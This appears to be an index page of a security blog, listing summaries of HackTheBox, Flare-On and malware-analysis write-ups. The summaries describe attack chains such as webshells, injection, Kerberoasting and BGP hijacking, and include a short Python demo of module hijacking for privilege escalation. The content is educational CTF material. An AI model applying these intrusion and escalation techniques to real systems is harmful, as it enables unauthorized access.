Flare-On 2019: bmphideflare-on ctf flare-on-bmphide dnspy dotnet anti-debug steganography reverse-engineering
bmphide was my favorite challenge this year (that I got to). It was challenging, yet doable and interesting. I’m given a bitmap image and a Windows .NET executable. That executable is used to hide information in the low bits of the image. I’ll have to reverse the exe to understand how to extract the data. I’ll also have to work around some anti-debug.
Flare-On 2019: demoflare-on ctf flare-on-demo x64dbg reverse-engineering
demo really threw me, to the point that I almost skipped writing it up. The file given is a demoscene production, a kind of competition entry aiming for the best visual performance out of an executable limited in size. To achieve this, packers are used to compress the binary. In the exe for this challenge, a 3D Flare logo comes up and spins, but the flag is missing. I'll have to unpack the binary and start messing with random DirectX functions until I find two ways to make the flag show up.
HTB: Ghoulhackthebox htb-ghoul ctf nmap gobuster hydra zipslip tomcat docker ssh pivot cewl john gogs tunnel gogsownz credentials suid git ssh-agent-hijack cron htb-reddish
Ghoul was a long box that involved pivoting between multiple docker containers, exploiting things and collecting information to move to the next step. With a level of pivoting not seen in HackTheBox since Reddish, I'll need to pay careful attention to various passwords and other bits of information as I move through the containers. I'll exploit a webapp using the ZipSlip vulnerability to get a webshell up and get a shell as www-data, only to find that the exploited webserver is running as root, and with another ZipSlip, I can escalate to root. Still with no flags, I'll crack an ssh key and pivot to the second container. From there, I can access a third container hosting the self-hosted Git solution, Gogs. With some password reuse and the gogsownz exploit, I'll get a shell on that container, and use a suid binary to get root. That provides access to a git repo that has a password I can use for root on the second container. As root, I can see ssh sessions connecting through this container and to the main host using ssh agent forwarding, and I'll hijack that to get root on the final host. In Beyond Root, I'll explore the ssh situation on the final host and get myself persistence, look at the crons running to simulate the user using ssh agent forwarding, and show a network map of the entire system.
Flare-On 2019: DNS Chessflare-on ctf flare-on-dnschess peda gdb wireshark python dns ida reverse-engineering
DNS Chess was really fun. I'm given a pcap, an ELF executable, and an ELF shared library. The two binaries form a game of chess, where commands are sent to an AI over DNS. I'll need to figure out how to spoof valid moves by reversing the binary, and then use valid moves to win the game.
Flare-On 2019: Flarebearflare-on ctf flare-on-flarebear apk genymotion android jadx algebra reverse-engineering
Flarebear was the first Android challenge, and I'm glad to see it at the beginning while it's still not too hard. I'll use GenyMotion cloud to emulate the application, and then jadx to decompile it and see what the win condition is. Once I find that, I can get the flag.
Flare-On 2019: Overlongflare-on ctf flare-on-overlong x64dbg reverse-engineering
Overlong was a challenge that could lead to complex rabbit holes, or, with some intelligent guess work, be solved quite quickly. From the start, with the title and the way that the word overlong was bolded in the prompt, I was looking for an integer to overflow or change in some way. That, plus additional clues, made this one pretty quick work.
HTB: SwagShopctf hackthebox htb-swagshop nmap magento gobuster deserialization webshell sudo oscp-like
SwagShop was a nice beginner / easy box centered around a Magento online store interface. I'll use two exploits to get a shell. The first is an authentication bypass that allows me to add an admin user to the CMS. Then I can use an authenticated PHP Object Injection to get RCE. I'll also show how I got RCE with a malicious Magento package. RCE leads to shell and user. To privesc to root, it's a simple exploit of sudo vi.
Flare-On 2019: Memecat Battlestation [Shareware Demo Edition]flare-on ctf flare-on-memecat-battlestation dnspy dotnet reverse-engineering
Memecat Battlestation [Shareware Demo Edition] was a really simple challenge that involved opening a .NET executable in a debugger and reading the correct phrases from the code. It was a good beginner challenge.
HTB: Kryptosctf hackthebox htb-kryptos nmap gobuster php burp mysql wireshark hashcat rc4 crypto python python-cmd disable-functions sqli webshell sqlite vimcrypt ssh tunnel python-eval filter
Kryptos feels different from most insane boxes. It brought an element of math / crypto into most of the challenges in a way that I really enjoyed. But it still layered challenges so that each step involved multiple exploits / bypasses, like all good insane boxes do. I'll start by getting access to a web page by telling the page to validate logins against a database on my box. The website gives me the ability to return encrypted webpage content that Kryptos can retrieve. I'll break the encryption to access pages I'm not able to access on my own, finding a SQLite test page that I can inject into to write a webshell that can access the file system. With file system access, I'll retrieve a Vim-crypted password backup, and crack that to get ssh access to the system. On the system, I'll access an API available only on localhost and take advantage of a weak random number generator to sign my own commands, bypassing Python protections to get code execution as root.
HTB: Lukehackthebox ctf htb-luke nmap gobuster credentials api nodejs jwt wfuzz ajenti hydra
Luke was a recon heavy box. In fact, the entire writeup for Luke could reasonably go into the Recon section. I’m presented with three different web interfaces, which I enumerate and bounce between to eventually get credentials for an Ajenti administrator login. Once I’m in Ajenti, I have access to a root shell, and both flags.
HTB: Holidayctf htb-holiday hackthebox nmap nodejs gobuster dirsearch burp xss filter sqli command-injection npm sudo oswe-plus
Holiday was a fun, hard, old box. The path to getting a shell involved SQL injection, cross site scripting, and command injection. The root was a bit simpler, taking advantage of a sudo on node package manager install to install a malicious node package.
HTB: Bastionhtb-bastion hackthebox ctf nmap smbmap smbclient smb vhd mount guestmount secretsdump crackstation ssh windows mremoteng oscp-like
Bastion was a solid easy box with some simple challenges like mounting a VHD from a file share, and recovering passwords from a password vault program. It starts, somewhat unusually, without a website, but rather with vhd images on an SMB share, that, once mounted, provide access to the registry hive necessary to pull out credentials. These creds provide the ability to ssh into the host as the user. To get administrator access, I’ll exploit the mRemoteNG installation, pulling the profile data and encrypted data, and show several ways to decrypt those. Once I break out the administrator password, I can ssh in as administrator.
HTB: OneTwoSevenctf htb-onetwoseven hackthebox nmap sftp tunnel ssh chroot vim crackstation php webshell apt mitm
OneTwoSeven was a very cleverly designed box. There were lots of steps, some enumeration, all of which was do-able and fun. I’ll start by finding a hosting provider that gives me SFTP access to their system. I’ll use that to tunnel into the box, and gain access to the admin panel. I’ll find creds for that using symlinks over SFTP. From there, I’ll exploit a logic error in the plugin upload to install a webshell. To get root, I’ll take advantage of my user’s ability to run apt update and apt upgrade as root, and man-in-the-middle the connection to install a backdoored package.
HTB: Unattendedctf htb-unattended hackthebox nmap gobuster sqli sqlmap nginx nginx-aliases lfi session-poisoning socat hidepid noexec mysql initrd cpio ida reverse-engineering oswe-like
Users rated Unattended much harder than the Medium rating it was released under. I think that’s because the SQLI vulnerability was easy to find, but dumping the database would take forever. So the trick was knowing when to continue looking and identify the NGINX vulnerability to leak the source code. At that point, the SQLI was much more manageable, providing LFI which I used with PHP session variables to get RCE and a shell. From there, it was injecting into some commands being taken from the database to move to the next user. And in the final step, examining an initrd file to get the root password. In Beyond Root, I’ll reverse the binary that generates the password, and give some references for initrd backdoors.
HTB: Helplinectf hackthebox htb-helpline nmap manageengine servicedesk default-creds excel cve-2017-9362 xxe responder cve-2017-11511 lfi hashcat
Helpline was a really difficult box, and it was an even more difficult writeup. It has so many paths, and yet all were difficult in some way. It was also one that really required Windows as an attack platform to do it the intended way. I got lucky in that this was the box I had chosen to try out Commando VM. Given the two completely different attack paths on Windows and Kali, I'll break this into three posts. In the first post, I'll do enumeration up to an initial shell. Then in one post I'll show how I solved it from Commando (Windows) using the intended paths. In the other post, I'll show how to go right to a shell as SYSTEM, and work backwards to get the root flag and eventually the user flag.
HTB: Arkhamctf hackthebox htb-arkham nmap gobuster faces jsf deserialization smb smbclient smbmap luks bruteforce-luks cryptsetup hmac htb-canape ysoserial python burp crypto nc http.server smbserver ost readpst mbox mutt pssession rlwrap winrm chisel evil-winrm uac meterpreter greatsct msbuild metasploit cmstp systempropretiesadvanced dll mingw32 oswe-plus htb-sizzle
In my opinion, Arkham was the most difficult Medium level box on HTB, as it could have easily been Hard and wouldn't have been out of place at Insane. But it is still a great box. I'll start with an encrypted LUKS disk image, which I have to crack. On it I'll find the config for a Java Server Faces (JSF) site, which provides the keys that allow me to perform a deserialization attack on the ViewState, providing an initial shell. I'll find an email file with the password for a user in the administrators group. Once I have that shell, I'll have to bypass UAC to grab root.txt.
HTB: Fortunectf htb-fortune hackthebox certificate certificate-authority sslyze command-injection burp burp-repeater firewall python python-cmd authpf openssl ssh nfs pgadmin postgresql credentials sqlite pfctl tcpdump htb-lacasadepapel
Fortune was a different kind of insane box, focused on taking advantage of things like authpf and nfs. I'll start off using command injection to find a key and certificate that allow access to an HTTPS site. On that site, I get instructions and an ssh key to connect via authpf, which doesn't provide a shell, but opens up new ports in the firewall. From there I can find nfs access to /home, which I can use with uid spoofing to get ssh access. For privesc, I'll find credentials in pgadmin's database which I can use to get a root shell. In Beyond Root, I'll look at the firewall configuration and why I couldn't turn command injection into a shell.
Bypassing PHP disable_functions with Chankroctf hackthebox htb-lacasadepapel chankro php disable-functions htb-hackback
I was reading Alamot’s LaCasaDePapel writeup, and they went a different way once they got the php shell. Instead of just using the php functions to find the certificate and key needed to read the private members https page, Alamot uses Chankro to bypass the disabled execution functions and run arbitrary code anyway. I had to try it.
HTB: LaCasaDePapelhackthebox htb-lacasadepapel ctf vsftpd searchsploit python psy php disable-functions certificate client-certificate openssl directory-traversal lfi ssh pspy supervisord cron metasploit ida iptables js certificate-authority reverse-engineering oscp-plus youtube
LaCasaDePapel was a fun easy box that required quite a few steps for a 20 point box, but none of which were too difficult. I’ll start off exploiting a classic backdoor bug in VSFTPd 2.3.4 which has been modified to return a shell in Psy, a php based debugging tool. From there, I can collect a key file which I’ll use to sign a client certificate, gaining access to the private website. I’ll exploit a path traversal bug in the site to get an ssh key for one of the users. To privesc, I’ll find a file that’s controlling how a cron is being run by root. The file is not writable and owned by root, but sits in a directory my current user owns, which allows me to delete the file and then create a new one. In Beyond Root, I’ll look at the modified VSFTPd server and show an alternative path that allows me to skip the certificate generation to get access to the private website.
HTB: CTFctf htb-ctf hackthebox nmap ldap ldap-injection second-order second-order-ldap-injection python-cmd python totp stoken 7z listfile wildcard htb-nightmare htb-stratosphere
CTF was hard in a much more straight-forward way than some of the recent insane boxes. It had steps that were difficult to pull off, and not even that many. But it was still quite challenging. I'll start using LDAP injection to determine a username and a seed for a one-time password token. Then I'll use that to log in. On seeing a command page, I'll need to go back and log in again, this time with a username that allows me a second-order LDAP injection to bypass the user check. Once I do, I can run commands, and find a user password in the php pages. With an SSH shell, I'll find a backup script that uses Sevenzip in a way that I can hijack to read the root flag. In Beyond Root, I'll look a little bit at SELinux, build a small shell to make running commands over the webpage easier, and look at the actual LDAP queries I injected into.
HTB: FriendZonehtb-friendzone ctf hackthebox nmap smbmap smbclient gobuster zone-transfer dns dig lfi php wfuzz credentials ssh pspy python-library-hijack oscp-like
FriendZone was a relatively easy box, but as far as easy boxes go, it had a lot of enumeration and garbage trolls to sort through. In all the enumeration, I'll find a php page with an LFI, and use SMB to read page source and upload a webshell. I'll privesc to the next user with creds from a database conf file, and then to root using a writable Python module to exploit a root cron job calling a Python script.
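The module-hijack pattern can be reproduced in miniature (a hypothetical sketch with made-up file names, not FriendZone's actual cron or module): Python puts the script's own directory at the front of the module search path, so a writable module there shadows anything else with the same name.

```python
import os
import subprocess
import sys
import tempfile

workdir = tempfile.mkdtemp()

# Attacker-writable module shadowing an import. A real payload would spawn
# a shell; here it just sets a marker we can observe.
with open(os.path.join(workdir, "utils.py"), "w") as f:
    f.write("HIJACKED = True\n")

# Stand-in for the root cron's script, which imports the module by name.
victim = os.path.join(workdir, "script.py")
with open(victim, "w") as f:
    f.write("import utils\nprint(utils.HIJACKED)\n")

# The script's directory leads sys.path, so our utils.py wins the import.
result = subprocess.run([sys.executable, victim],
                        capture_output=True, text=True)
print(result.stdout.strip())
```

The defense is the same as for PATH hijacks: don't leave directories on the import path writable by less-privileged users when a privileged job runs the script.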
HTB: Hackbackctf hackthebox htb-hackback nmap wfuzz jq gophish php disable-functions aspx rot13 javascript gobuster tio-run log-poisoning python python-cmd regeorge winrm proxychains cron named-pipe seimpersonate command-injection service arbitrary-write diaghub visual-studio dll alternative-data-streams webshell rdesktop rdp oswe-plus htb-flujab
Hackback is the hardest box that I've done on HTB. By far. Without question. If you'd like data to back that up, consider the first blood times of over 1.5 and 2.5 days! I remember vividly working on this box with all my free time, and being the 5th to root it (7th root counting the two box authors) in the 6th day. I'll start by finding a host whose main attack point is a GoPhish interface. This interface gives up some domain names for fake phishing sites on the same host, which I can use to find an admin interface which I can abuse to get file system access via log poisoning. Unfortunately, all the functions I need to get RCE via PHP or ASPX are disabled. I can however upload reGeorge and use it to tunnel a connection to WinRM, where I can use some creds I find in a config file. I'll then use a named pipe to execute nc as the next user. From there I can abuse a faulty service that allows me to write as SYSTEM wherever I want to overwrite a file in SYSTEM32, and then use DiagHub to get a SYSTEM shell. In Beyond Root, I'll look at an unintended way to get root.txt as hacker, explore why an aspx webshell fails and find a work around to get it working, check out the PowerShell source for the web server listening on 6666, and look into an RDP connection.
Darling: Running MacOS Binaries on Linuxtools bsides-london ctf darling python mach-o macos
I attended BSides London almost a month ago now, and of course took a look at the CTF. There were a handful of reversing challenges, but multiple of them were MacOS (Mach-O) binaries. As I looked down at my Windows laptop and my Kali VM, I felt at a bit of a disadvantage. While I was able to solve one of the challenges just with IDA, I went looking for a way to run Mac binaries on a Linux OS. And I found Darling. It took basically the rest of the day to install, so I didn't get to any of the additional challenges, but I am happy to be semi-equipped the next time the need comes up.
HTB: Netmonhtb-netmon hackthebox ctf nmap ftp password-reuse prtg command-injection psexec-py oscp-plus htb-jerry
Netmon rivals Jerry and Blue for the shortest box I’ve done. The user first blood went in less than 2 minutes, and that’s probably longer than it should have been as the hackthebox page crashed right at open with so many people trying to submit flags. The host presents the full file system over anonymous FTP, which is enough to grab the user flag. It also hosts an instance of PRTG Network Monitor on port 80. I’ll use the FTP access to find old creds in a backup configuration file, and use those to guess the current creds. From there, I can use a command injection vulnerability in PRTG to get a shell as SYSTEM, and the root flag.
HTB: Querier | ctf htb-querier hackthebox nmap windows smb smbclient olevba macros vba mssql mssqlclient xp-dirtree net-ntlmv2 responder hashcat xpcmdshell powerup gpp smbserver nc wmiexec service oscp-plus htb-giddy
Querier was a fun medium box that involved some simple document forensics, mssql access, responder, and some very basic Windows Privesc steps. I’ll show how to grab the Excel macro-enabled workbook from an open SMB share, and find database credentials in the macros. I’ll use those credentials to connect to the host’s MSSQL as a limited user. I can use that limited access to capture a Net-NTLMv2 hash with responder, and cracking it provides enough database access to run commands. That’s enough to provide a shell. For privesc, running PowerUp.ps1 provides administrator credentials from a GPP file. In Beyond Root, I’ll look at the other four things that PowerUp points out, and show how one of them will also provide a shell as SYSTEM.
HTB: FluJab | htb-flujab ctf hackthebox nmap openssl wfuzz cookies python scripting sqli injection python-cmd python ajenti ssh cve-2008-0166 tcp-wrapper rbash gtfobins make screen arbitrary-write
FluJab was a long and difficult box, with several complicated steps which require multiple pieces working together and careful enumeration. I’ll start by enumerating a host that hosts websites for many different customers, and is meant to be like a CloudFlare IP. Once identifying the host I’m targeting, I’ll find some weird cookie values that I can manipulate to get access to configuration pages. There I can configure the SMTP to go through my host, and use an SQL injection in one of the forms where I can read the results over email. Information in the database gives me credentials and a new subdomain, where I can access an instance of the Ajenti server admin panel. That allows me to identify weak ssh keys, and to add my host to an ssh TCP Wrapper whitelist. Then I can ssh in with the weak private key. From there, I’ll find a vulnerable version of screen which I can use to get a root shell. In Beyond Root, I’ll show an unintended path to get a shell through Ajenti using the API, look at the details of the screen exploit, explore the box’s clean up crons, and point out an oddity with nurse jackie.
HTB: Help | htb-help hackthebox ctf nmap graphql curl crackstation gobuster helpdeskz searchsploit exploit-db sqli blindsqli sqlmap ssh credentials filter php webshell exploit cve-2017-16995 cve-2017-5899 oswe-like
Help was an easy box with some neat challenges. As far as I can tell, most people took the unintended route which allowed for skipping the initial section. I’ll enumerate a GraphQL API to get credentials for a HelpDeskZ instance. I’ll use those creds to exploit an authenticated SQLi vulnerability and dump the database. In the database, I’ll find creds which work to ssh into the box. Alternatively, I can use an unauthenticated upload bypass in HelpDeskZ to upload a webshell and get a shell from there. For root, it’s kernel exploits.
HTB: Sizzle | hackthebox htb-sizzle ctf nmap gobuster smbmap smbclient smb ftp regex regex101 responder scf net-ntlmv2 hashcat ldapdomaindump ldap certsrv certificate firefox openssl winrm constrained-language-mode psbypassclm metasploit meterpreter installutil msbuild msfvenom kerberoast tunnel rubeus chisel bloodhound smbserver dcsync secretsdump crackmapexec wmiexec cron ntlm-http burp htb-active htb-reel certificate-authority client-certificate oscp-plus adcs htb-giddy htb-bighead
I loved Sizzle. It was just a really tough box that reinforced Windows concepts that I hear about from pentesters in the real world. I’ll start with some SMB access, use a .scf file to capture a user’s NetNTLM hash, and crack it to get creds. From there I can create a certificate for the user and then authenticate over WinRM. I’ll Kerberoast to get a second user, who is able to run the DCSync attack, leading to an admin shell. I’ll have two Beyond Root sections, the first to show two unintended paths, and the second to exploit NTLM authentication over HTTP, and how Burp breaks it.
HTB: Chaos | htb-chaos ctf hackthebox nmap webmin gobuster wordpress wpscan imap openssl roundcube wfuzz crypto python latex pdftex rbash gtfobins tar password-reuse firefox
Chaos provided a couple interesting aspects that I had not worked with before. After some web enumeration and password guessing, I found myself with webmail credentials, which I could use on a webmail domain or over IMAP to get access to the mailbox. In the mailbox was an encrypted message, that once broken, directed me to a secret url where I could exploit an instance of pdfTeX to get a shell. From there, I used a shared password to switch to another user, performed a restricted shell escape, and found the root password in the user’s firefox saved passwords. That password was actually for a Webmin instance, which I’ll exploit in Beyond Root.
Malware Analysis: Pivoting In VT | malware emotet olevba oledump powershell virustotal
After pulling apart an Emotet phishing doc in the previous post, I wanted to see if I could find similar docs from the same phishing campaign, and perhaps even different docs from previous phishing campaigns based on artifacts in the seed document. With access to a paid VirusTotal account, this is not difficult to do.
Malware Analysis: Unnamed Emotet Doc | malware emotet olevba oledump powershell virustotal cyberchef urlscan
I decided to do some VT roulette and check out some recent phishing docs in VT. I searched for documents with only a few (5-12) detections, and the top item was an Emotet word doc. The Emotet group continues to tweak their strategy to avoid AV. In this doc, they use TextBox objects to hold both the base64 encoded PowerShell and the PowerShell command line itself, in a way that actually makes it hard to follow with olevba. I’ll use oledump to show the parts that olevba misses.
HTB: Conceal | ctf hackthebox htb-conceal nmap snmp snmpwalk ike ipsec ike-scan strongswan iis gobuster webshell upload nishang juicypotato potato watson windows windows10 oscp-like htb-mischief htb-bounty
Conceal brought something to HTB that I hadn’t seen before - connecting via an IPSEC VPN to get access to the host. I’ll use clues from SNMP and a lot of guessing and trial and error to get connected, and then it’s a relatively basic Windows host, uploading a webshell over FTP, and then using JuicyPotato to get SYSTEM privileges. The box is very much unpatched, so I’ll show Watson as well, and leave exploiting those vulnerabilities as an exercise for the reader. It actually blows my mind that it only took 7 hours for user first blood, but then an additional 16.5 hours to root.
HTB: Lightweight | ctf hackthebox htb-lightweight nmap php linux centos ssh fail2ban ldap tcpdump wireshark credentials bruteforce hashcat capabilities openssl htb-ethereal sudoers arbitrary-write oscp-plus
Lightweight was relatively easy for a medium box. The biggest trick was figuring out that you needed to capture ldap traffic on localhost to get credentials, and getting that traffic to generate. The box actually starts off with creating an ssh account for me when I visit the webpage. From there I can capture plaintext creds from ldap to escalate to the first user. I’ll crack a backup archive to get creds to the second user, and finally use a copy of openssl with full Linux capabilities assigned to it to escalate to root. In Beyond Root, I’ll look at the backup site and the real one, and how they don’t match, as well as look at the script for creating users based on http visits.
HTB: BigHead | ctf hackthebox htb-bighead nmap windows 2k8sp2 gobuster wfuzz phpinfo dirsearch nginx github john hashcat zip 7z bof exploit python bitvise reg plink chisel tunnel ssh bvshell webshell keepass bash kpcli alternative-data-streams
BigHead required you to earn your 50 points. There was a ton of enumeration. There was a really fun but challenging buffer overflow to get initial access, then some pivoting across the same host using SSH and a PHP vulnerability, and then finding a hidden KeePass database with a keyfile in an ADS stream which gave me the root flag.
BigHead Exploit Dev | ctf hackthebox htb-bighead bof exploit python pwntools immunity mona ida reverse-engineering mingw nginx pattern-create egg-hunter
As my buffer overflow experience on Windows targets is relatively limited (only the basic vulnserver jmp esp type exploit previously), BigHeadWebSrv was probably the most complicated exploit chain I’ve written for a Windows target. The primary factor that takes this above something like a basic jmp esp is that the space I have to write to is small. I got to learn a new technique, Egg Hunter, which is a small amount of code that will look for a marker I drop into memory earlier and run the shellcode after it.
HTB: Irked | ctf hackthebox htb-irked nmap searchsploit exploit-db hexchat irc python steganography steghide ssh su password-reuse metasploit exim oscp-like
Irked was another beginner level box from HackTheBox that provided an opportunity to do some simple exploitation without too much enumeration. First blood for user fell in minutes, and root in 19. I’ll start by exploring an IRC server, and not finding any conversation, I’ll exploit it with some command injection. That leads me to a hint to look for steg with a password, which I’ll find on the image on the web server. That password gets me access as the user. I’ll find a setuid binary that’s trying to run a script out of /tmp that doesn’t exist. I’ll add code to that script to get a shell. In Beyond Root, I’ll look at the Metasploit Payload for the IRC exploit, as well as some failed privesc exploits.
HTB: Teacher | htb-teacher ctf hackthebox debian stretch nmap gobuster skipfish hydra python cve-2018-1133 crackstation mysql pspy su cron chmod passwd arbitrary-write moodle
Teacher was a 20-point box (despite the yellow avatar). At the start, it required enumerating a website and finding a png file that was actually a text file that revealed most of a password. I’ll use hydra to brute force the last character of the password, and gain access to a Moodle instance, software designed for online learning. I’ll abuse a PHP injection in the quiz feature to get code execution and a shell on the box. Then, I’ll find an md5 in the database that is the password for the main user on the box. From there, I’ll take advantage of a root cron that’s running a backup script, and give myself write access to whatever I want, which I’ll use to get root.
Commando VM: Lessons Learned | home-lab commando fireeye smb net-view net-use firewall python winrm responder htb-ethereal
I worked a HackTheBox target over the last week using CommandoVM as my attack station. I was pleasantly surprised with how much I liked it. In fact, only once on this box did I need to fire up my Kali workstation. Because the target was Windows, there were parts that were made easier (and in one case made possible!). There were a couple additional struggles that arose, and I’m still in search of a good tmux equivalent. I’ll walk through some of the lessons learned from working in this distro.
HTB: RedCross | ctf htb-redcross hackthebox ssh nmap wfuzz linux debian php cookies gobuster xss sqli sqlmap command-injection injection postgresql haraka exploit-db searchsploit suid sudo sudoers nss jail bof exploit python pwntools socat rop aslr htb-frolic htb-october
RedCross was a maze, with a lot to look at and multiple paths at each stage. I’ll start by enumerating a website, and showing two different ways to get a cookie to use to gain access to the admin panel. Then, I’ll get a shell on the box as penelope, either via an exploit in the Haraka SMTP server or via injection in the webpage and the manipulation of the database that controls the users in the ssh jail. Finally, I’ll show escalation to root three different ways, using the database again in two different ways, and via a buffer overflow in a setuid binary. In Beyond Root, I’ll dig into the SQL injection and check out how the ssh jail is configured.
Commando VM: Looking Around | home-lab commando fireeye openvpn burp 7zip winrar cmder greenshot windump payloadsallthethings seclists fuzzdb foxyproxy x64dbg dnspy ida ghidra gobuster wfuzz
Having built my CommandoVM in a previous post, now I am going to look at what’s installed, and what else I might want to add to the distribution. I’ll start with some tweaks I made to get the box into shape, check out what tools are present, and add some that I notice missing. After this, I’ll use the VM to work an HTB target, and report back in a future post.
Commando VM: Installation | home-lab commando fireeye youtube
Ever since Fireeye announced their new CommandoVM, the “Complete Mandiant Offensive VM”, I’d figured next time I had an occasion to target a Windows host, I would try to build a VM and give it a spin. This post is focused on getting up and running. I suspect additional posts on how it works out will follow.
HTB: Vault | ctf htb-vault hackthebox nmap gobuster php upload webshell ssh credentials pivot qemu spice openvpn tunnel rbash gpg remmina ubuntu linux iptables sudo filter oswe-like
Vault was a really neat box in that it required pivoting from a host into various VMs to get to the vault, at least the intended way. There’s an initial php upload filter bypass that gives me execution. Then a pivot with an OpenVPN config RCE. From there I’ll find SSH creds, and need to figure out how to pass through a firewall to get to the vault. Once in the vault, I find the flag encrypted with GPG, and I’ll need to move it back to the host to get the decryption keys to get the flag. In Beyond Root, I’ll look at a couple of unintended paths, including a firewall bypass by adding an IP address, and a way to bypass the entire thing by connecting to the Spice ports, rebooting the VMs into recovery, resetting the root password, and then logging in.
Wizard Labs: DevLife | ctf wizard-labs wl-devlife linux debian nmap gobuster python credentials
Another Wizard Lab’s host retired, DevLife. This was another really easy box, that required some simple web enumeration to find a python panel that would run python commands, and display the output. From there, I could get a shell and the first flag. Then, more enumeration to find a python script in a hidden directory that contained the root password. With that, I can escalate to root. There was also a swp file in the hidden directory that I’ll attempt to recover (and then figure out it’s actually from nano), and I’ll look at how the php page runs python commands, and show an injection in that.
HTB: Curling | ctf hackthebox htb-curling nmap joomla searchsploit webshell cron pspy curl suid cve-2019-7304 dirty-sock ubuntu exploit htb-sunday arbitrary-write
Curling was a solid easy box that provides a chance to practice some basic enumeration to find a password, using that password to get access to a Joomla instance, and using that access to get a shell. With a shell, I’ll find a compressed and encoded backup file, that after a bit of unpacking, gives a password to privesc to the next user. As that user, I’ll find a root cron running curl with the option to use a configuration file. It happens that I can control that file, and use it to get the root flag and a root shell. In Beyond Root, I’ll look at how setuid applies to scripts on most Linux flavors (and how it’s different from Solaris as I showed with Sunday), and how the Dirty Sock snapd vulnerability from a couple months ago will work here to go to root.
Analyzing Document Macros with Yara | phishing vbscript yara documents metasploit powershell
This post is actually inspired by a box I’m building for HTB, so if it ever gets released, some of you may see this post again. But Yara is also something I’ve used a ton professionally, and it is super useful. I’ll introduce Yara, a pattern matching tool which is super useful for malware analysis, and just a general use tool that’s useful to know. I’ll also look at the file format for both Microsoft Office and Libre Office documents, and how to decompress them to identify their contents. I’ll show how for Libre Office files, Yara can be applied to the unzipped document to identify macro contents.
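As a quick illustration of the file format point (my own sketch, not code from the post): both Microsoft Office and Libre Office documents are ZIP archives, so Python’s zipfile is enough to unpack one and spot macro members before pointing Yara at them. The member names below are a made-up stand-in for a real document.

```python
import io
import zipfile

# Build a tiny stand-in for a Libre Office document: both docx and odt
# are ZIP archives whose member names reveal content and macro streams.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("mimetype", "application/vnd.oasis.opendocument.text")
    zf.writestr("content.xml", "<office:document-content/>")
    zf.writestr("Basic/Standard/Module1.xml", "<!-- macro code here -->")

# Listing the members is enough to identify embedded macros; a Yara
# rule would then be run over the unzipped files to match their contents.
with zipfile.ZipFile(io.BytesIO(buf.getvalue())) as zf:
    names = zf.namelist()
    macros = [n for n in names if n.startswith("Basic/")]

print(macros)
```

Running this prints the single macro member, the kind of path a rule can key on.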
HTB: October | hackthebox ctf htb-october webshell ubuntu linux bof exploit upload nmap oscp-plus aslr aslr-brute-force htb-frolic
October was interesting because it paired a very straight-forward initial access with a simple buffer overflow for privesc. To gain access, I’ll learn about an extension blacklist bypass against the October CMS, allowing me to upload a webshell and get execution. Then I’ll find a SetUID binary that I can overflow to get root. While the buffer overflow exploit was on the more straight-forward side, it still requires a level of skill beyond many of the other easy early boxes I’ve done so far.
HTB: Frolic | htb-frolic hackthebox ctf nmap smbmap smbclient nodered gobuster php playsms javascript ook! python brainfuck fcrackzip xxd cve-2017-9101 webshell bof ret2libc peda metasploit oscp-like htb-reddish
Frolic was more a string of challenges and puzzles than the more typical HTB experiences. Enumeration takes me through a series of puzzles that eventually unlock the credentials to a PlaySMS web interface. With that access, I can exploit the service to get execution and a shell. To gain root, I’ll find a setuid binary owned by root, and overflow it with a simple ret2libc attack. In Beyond Root, I’ll look at the Metasploit version of the PlaySMS exploit and reverse its payload. I’ll also glance through the Bash history files of the two users on the box and see how the author built the box.
HTB: Carrier | ctf hackthebox htb-carrier injection command-injection bgp-hijack nmap gobuster snmp snmpwalk pivot container tcpdump lxc lxd ssh
Carrier was awesome, not because it was super hard, but because it provided an opportunity to do something that I hear about all the time in the media, but have never been actually tasked with doing - BGP Hijacking. I’ll use SNMP to find a serial number which can be used to log into a management status interface for an ISP network. From there, I’ll find command injection which actually gives me execution on a router. The management interface also reveals tickets indicating some high value FTP traffic moving between two other ASNs, so I’ll use BGP hijacking to route the traffic through my current access, gaining access to the plaintext credentials. In Beyond Root, I’ll look at an unintended way to skip the BGP hijack, getting a root shell and how the various containers were set up, why I only had to hijack one side of the conversation to get both sides, the website and router interaction and how to log commands sent over ssh, and what “secretdata” really was.
AppLocker Bypass: COR Profiler | ctf hackthebox htb-ethereal windows applocker meterpreter metasploit beryllium visualstudio dotnet cor-profiler
One of the challenges in Ethereal was having to use a shell comprised of two OpenSSL connections over different ports. And each time I wanted to exploit some user action, I had to set my trap in place, kill my shell, start two listeners, and wait. Things would have been a lot better if I could have just gotten a shell to connect back to me over one of the two open ports, but AppLocker made that nearly impossible. IppSec demoed a method to bypass those filters using COR Profiling. I wanted to play with it myself, and get some notes down (in the form of this post).
HTB: Bastard | hackthebox htb-bastard ctf web drupal drupalgeddon2 drupalgeddon3 droopescan dirsearch nmap windows searchsploit nishang ms15-051 smbserver htb-devel htb-granny php webshell oscp-like
Bastard was the 7th box on HTB, and it presented a Drupal instance with a known vulnerability at the time it was released. I’ll play with that one, as well as two more, Drupalgeddon2 and Drupalgeddon3, and use each to get a shell on the box. The privesc was very similar to other early Windows challenges, as the box is unpatched, and vulnerable to kernel exploits.
HTB: Ethereal | ctf hackthebox htb-ethereal nmap pbox credentials injection hydra python shell dns-c2 firewall nslookup openssl lnk pylnker lnkup wfuzz ca msi windows
Ethereal was quite difficult, and up until a few weeks ago, potentially the hardest on HTB. Still, it was hard in a fun way. The path through the box was relatively clear, and yet, each step presented a technical challenge to figure out what was going on and how I could use it to get what I wanted. I’ll start by breaking into an old password vault that I find on FTP, and using that to authenticate to a website. That site has code injection, and I’ll use that to get exfil and eventually a weak shell over DNS. I’ll discover OpenSSL, and use that to get a more stable shell. From there, I’ll replace a shortcut to escalate to the next user. Then I’ll use CA certs that I find on target to sign an MSI file to give me a shell as the administrator. I’ll also attach two additional posts, one going into how I attacked pbox, and another on how I developed a shell over blind command injection and dns.
HTB: Ethereal Attacking Password Box | ctf hackthebox htb-ethereal windows pbox freebasic bruteforce credentials basic
For Ethereal, I found a DOS application, pbox.exe, and a pbox.dat file. These were associated with a program called PasswordBox, which was an early password manager program. To solve this box, most people likely just guessed the password, “password”. But what if I had needed to brute force it? The program was not friendly to taking input from stdin, or to running inside python. So I downloaded the source code, installed the FreeBasic compiler, and started hacking at the source until it ran in a way that let me brute force test 1000 passwords in 5 seconds. I’ll walk through my steps and thought process in this post.
HTB: Ethereal Shell Development | ctf hackthebox htb-ethereal windows dns-c2 python pdb python-cmd python-scapy injection python-requests
